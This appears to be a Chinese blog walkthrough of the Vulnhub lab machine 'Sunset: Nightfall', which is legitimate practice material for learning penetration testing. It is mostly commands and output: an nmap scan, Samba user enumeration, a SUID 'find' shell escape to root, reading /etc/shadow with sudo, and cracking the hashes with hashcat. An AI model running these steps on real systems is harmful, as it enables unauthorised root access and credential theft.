靶机链接:

https://www.vulnhub.com/entry/sunset-nightfall,355/

主机扫描:

╰─ nmap -p- -A 10.10.202.162
Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-09 14:23 CST
Nmap scan report for 10.10.202.162
Host is up (0.0013s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp pyftpdlib 1.5.5
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 10.10.202.162:21
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
22/tcp open ssh OpenSSH 7.9p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
| 2048 a9:25:e1:4f:41:c6:0f:be:31:21:7b:27:e3:af:49:a9 (RSA)
| 256 38:15:c9:72:9b:e0:24:68:7b:24:4b:ae:40:46:43:16 (ECDSA)
|_ 256 9b:50:3b:2c:48:93:e1:a6:9d:b4:99:ec:60:fb:b6:46 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.5.5-10.3.15-MariaDB-1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.15-MariaDB-1
| Thread ID: 12
| Capabilities flags: 63486
| Some Capabilities: Support41Auth, IgnoreSigpipes, FoundRows, SupportsTransactions, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolOld, ConnectWithDatabase, SupportsLoadDataLocal, InteractiveClient, SupportsCompression, Speaks41ProtocolNew, LongColumnFlag, ODBCClient, DontAllowDatabaseTableColumn, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
| Status: Autocommit
| Salt: WQqd#~rD;<X*fFgW[C}l
|_ Auth Plugin Name: 96
MAC Address: 00:0C:29:D0:0F:15 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: NIGHTFALL; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h19m59s, deviation: 2h18m33s, median: 0s
|_nbstat: NetBIOS name: NIGHTFALL, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: nightfall
| NetBIOS computer name: NIGHTFALL\x00
| Domain name: nightfall
| FQDN: nightfall.nightfall
|_ System time: 2019-09-09T02:24:13-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-09-09 14:24:13
|_ start_date: N/A

TRACEROUTE
HOP RTT ADDRESS
1 1.35 ms 10.10.202.162

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.44 seconds

有samba就枚举下系统账户

╰─ enum4linux 10.10.202.162

nightfall
matt

进行提权操作:

find / -perm -u=s -type f 2>/dev/null

./find . -exec /bin/sh -p \; -quit

进入到nightfall 目录下,创建.ssh 目录,长传秘钥文件

sudo -u root cat /etc/shadow

╰─ hashcat -m 1800 hash.txt /usr/share/wordlists/rockyou.txt --force

OVER!

Sunset: Nightfall Vulnhub Walkthrough的更多相关文章

  1. Sunset: dusk: Vulnhub Walkthrough

    靶机链接: https://www.vulnhub.com/entry/sunset-dusk,404/ 主机IP扫描: IP端口扫描: 21 端口  pyftpdlib 1.5.5 版本漏洞 25 ...

  2. Sunset: Vulnhub Walkthrough

    主机扫描: ╰─ nmap -p1-65535 -sV -A 10.10.202.147 PORT STATE SERVICE VERSION21/tcp open ftp pyftpdlib 1.5 ...

  3. HA Joker Vulnhub Walkthrough

    下载地址: https://www.vulnhub.com/entry/ha-joker,379/ 主机扫描: ╰─ nmap -p- -sV -oA scan 10.10.202.132Starti ...

  4. HA: ISRO Vulnhub Walkthrough

    下载地址: https://www.vulnhub.com/entry/ha-isro,376/ 主机扫描: ╰─ nmap -p- -sV -oA scan 10.10.202.131Startin ...

  5. LAMPSecurity: CTF6 Vulnhub Walkthrough

    镜像下载地址: https://www.vulnhub.com/entry/lampsecurity-ctf6,85/ 主机扫描: ╰─ nmap -p- -sV -oA scan 10.10.202 ...

  6. Hacker Fest: 2019 Vulnhub Walkthrough

    靶机地址: https://www.vulnhub.com/entry/hacker-fest-2019,378/ 主机扫描: FTP尝试匿名登录 应该是WordPress的站点 进行目录扫描: py ...

  7. DC8: Vulnhub Walkthrough

    镜像下载链接: https://www.vulnhub.com/entry/dc-8,367/#download 主机扫描: http://10.10.202.131/?nid=2%27 http:/ ...

  8. HA: Infinity Stones Vulnhub Walkthrough

    下载地址: https://www.vulnhub.com/entry/ha-infinity-stones,366/ 主机扫描: 目录枚举 我们按照密码规则生成字典:gam,%%@@2012 cru ...

  9. Dc:7 Vulnhub Walkthrough

    靶机下载地址: https://www.vulnhub.com/entry/dc-7,356/ 主机扫描: http://10.10.202.161/ Google搜索下: SSH 登录 以上分析得出 ...

随机推荐

  1. Java多线程编程(5)--线程间通信

    一.等待与通知   某些情况下,程序要执行的操作需要满足一定的条件(下文统一将其称之为保护条件)才能执行.在单线程编程中,我们可以使用轮询的方式来实现,即频繁地判断是否满足保护条件,若不满足则继续判断 ...

  2. day 49

    今日内容 标签操作 样式操作 样式类操作 addClass(); // 添加指定的CSS类名. removeClass(); // 移除指定的CSS类名. hasClass(); // 判断样式存不存 ...

  3. 计蒜客 The Preliminary Contest for ICPC Asia Nanjing 2019

    F    Greedy Sequence You're given a permutation aa of length nn (1 \le n \le 10^51≤n≤105). For each  ...

  4. Linux 命令之 scp 命令详解

    Linux 命令之 scp 命令详解 一.scp 简介 scp 命令用于不同主机之间复制文件和目录. scp 是 secure copy 的缩写,是 基于 ssh 协议进行安全的远程文件拷贝命令. s ...

  5. centos 7 MysSQL 5.7.23 源码安装

    MySQL 5.7.23 源码安装 CentOS 7 将默认数据库MySQL替换成了Mariadb. 这里会从系统的环境准备开始一步一步安装. 环境准备 系统版本 内核版本 IP地址 Centos 7 ...

  6. Django中间件详解

    Django中间件详解 中间件位置 WSGI 主要负责的就是负责和浏览器和应用之家沟通的桥梁 浏览器发送过来一个http请求,WSGI负责解包,并封装成能够给APP使用的environ,当app数据返 ...

  7. php踩过的那些坑(5)浮点数计算

    一.前方有坑 php在使用加减乘除等运算符计算浮点数的时候,经常会出现意想不到的结果,特别是关于财务数据方面的计算,给不少工程师惹了很多的麻烦.比如今天工作终于到的一个案例: $a = 2586; $ ...

  8. WSGI到底是什么?

    在用Python Web开发时经常会遇到WSGI,所以WSGI到底是什么呢?本文我们一起来揭开WSGI神秘的面纱! 先来看一下WSGI的介绍: 全称Python Web Server Gateway ...

  9. PAT甲级专题|链表

    PAT链表专题 关于PAT甲级的链表问题,主要内容 就是"建立链表" 所以第一步学会模拟链表,pat又不卡时间,这里用vector + 结构体,更简洁 模拟链表的普遍代码 cons ...

  10. Spring Boot 最简单整合Shiro+JWT方式

    简介 目前RESTful大多都采用JWT来做授权校验,在Spring Boot 中可以采用Shiro和JWT来做简单的权限以及认证验证,在和Spring Boot集成的过程中碰到了不少坑.便结合自身以 ...